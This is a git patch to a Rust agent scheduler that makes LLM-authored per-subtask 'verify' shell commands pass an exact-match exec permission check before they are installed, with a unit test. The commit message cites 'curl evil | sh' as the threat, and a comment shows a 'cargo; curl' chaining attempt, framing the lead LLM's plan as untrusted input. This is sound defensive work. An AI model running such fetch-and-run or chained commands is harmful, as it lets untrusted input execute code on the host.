From 3e69bba0d3fba9223213e081179d955c0d990d0a Mon Sep 17 00:00:00 2001 From: Shawn Hartsock Date: Mon, 29 Jun 2026 11:48:04 -0400 Subject: [PATCH] feat(ocap): gate the team-mode per-subtask verify through the exec axis (#754) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit OCAP enforcement-floor stack (#749, PR 5/8; stacked on #760). The lead-authored per-subtask verify (team.rs run_team) was installed as the test command with NO exec check — a malicious verify (curl evil | sh) ran ungated (the T2 verify-as-payload vector, design review §3.3). Now caveats.permits_exec(verify) gates it before set_test_command: a denied verify is refused-not-run (not installed; the workspace default check stands; an honest note surfaces it). permits_exec is the same predicate used for the top-level (crew_runner) + plan-leaf (plan_exec) verifies. TDD: denied_per_subtask_verify_is_refused_not_installed — exec=Only([check-a]); verify check-b is NOT installed, check-a is (red on today's code — both installed; green after). RED verified by revert. just check green (6 team tests). Fixes #754. Part of #749. Refs #739, #741. Co-authored-by: Claude Opus 4.8 (1M context) --- newt-scheduler/src/team.rs | 56 ++++++++++++++++++++++++++++++++++++-- 1 file changed, 54 insertions(+), 2 deletions(-) diff --git a/newt-scheduler/src/team.rs b/newt-scheduler/src/team.rs index 9023be8..aa70c56 100644 --- a/newt-scheduler/src/team.rs +++ b/newt-scheduler/src/team.rs @@ -15,7 +15,7 @@ //! orchestration over the existing seams — unit-testable with mocks, no network. use crate::{run_crew, BackendPool, ChatRequest, CrewConfig, CrewStatus, Dispatcher, Workspace}; -use newt_core::caveats::Caveats; +use newt_core::caveats::{Caveats, CaveatsExt}; use newt_core::Tier; use serde::{Deserialize, Serialize}; @@ -163,8 +163,26 @@ pub async fn run_team( }); continue; } + // #754 — gate the per-subtask `verify` through the exec axis (the T2 + // "verify-as-payload" vector). The `verify` is LEAD-authored, and the + // lead is an LLM: untrusted plan input. Installed as the workspace test + // command, the crew later runs it as a shell command (`sh -c`), so its + // authority follows its PROVENANCE — it must be authorized by the exec + // caveat, fail-closed, exactly as `crew_runner` gates the caller-supplied + // top-level verify and `plan_exec` gates the plan-leaf verify. + // `permits_exec` is exact-match, so a narrow exec scope cannot be escaped + // by chaining ("cargo; curl" never equals "cargo"). REFUSE, not run: a + // denied verify is NOT installed — the subtask proceeds under the + // workspace's DEFAULT check rather than executing an un-permitted command. if let Some(verify) = &st.verify { - workspace.set_test_command(verify); + if caveats.permits_exec(verify) { + workspace.set_test_command(verify); + } else { + eprintln!( + "per-subtask verify refused: {verify:?} is outside the exec caveat \ + — falling back to the workspace default check" + ); + } } let outcome = run_crew(pool, dispatcher, workspace, &cfg.crew, caveats, &st.task).await; let status = match outcome.status { @@ -449,6 +467,40 @@ mod tests { ); } + #[tokio::test] + async fn denied_per_subtask_verify_is_refused_not_installed() { + // #754 (T2 "verify-as-payload"): the per-subtask `verify` is LEAD-authored + // — the lead is an LLM, so it is untrusted plan input. The exec caveat here + // permits "check-a" but NOT "check-b". The permitted verify IS installed; + // the denied one is REFUSED, not run — it is absent from the recorded + // commands, so that subtask falls back to the workspace's default check + // instead of executing an un-permitted shell command. + // + // RED on pre-#754 code: `set_test_command` was called unconditionally, so + // BOTH "check-a" and "check-b" were recorded. GREEN after: only "check-a". + let p = pool(); + let d = TeamMock { + plan_json: r#"{"subtasks":[ + {"task":"do A","verify":"check-a"}, + {"task":"do B","verify":"check-b"} + ]}"# + .into(), + block: false, + planner_calls: AtomicUsize::new(0), + }; + let mut ws = MemWs::new(); + // Exec authority covers ONLY "check-a"; "check-b" is outside the caveat. + let mut caveats = newt_core::caveats::Caveats::top(); + caveats.exec = newt_core::caveats::Scope::only(["check-a".to_string()]); + let out = run_team(&p, &d, &mut ws, &cfg(), &caveats, "goal").await; + // The plan still ran (refuse-not-run: the denied subtask proceeds under the + // default check, which the converging crew passes). + assert_eq!(out.status, TeamStatus::AllPassed); + assert_eq!(out.plan, vec!["do A".to_string(), "do B".to_string()]); + // Only the permitted verify was installed; the denied one was refused. + assert_eq!(ws.verifies, vec!["check-a".to_string()]); + } + #[tokio::test] async fn empty_plan_is_no_plan() { let p = pool();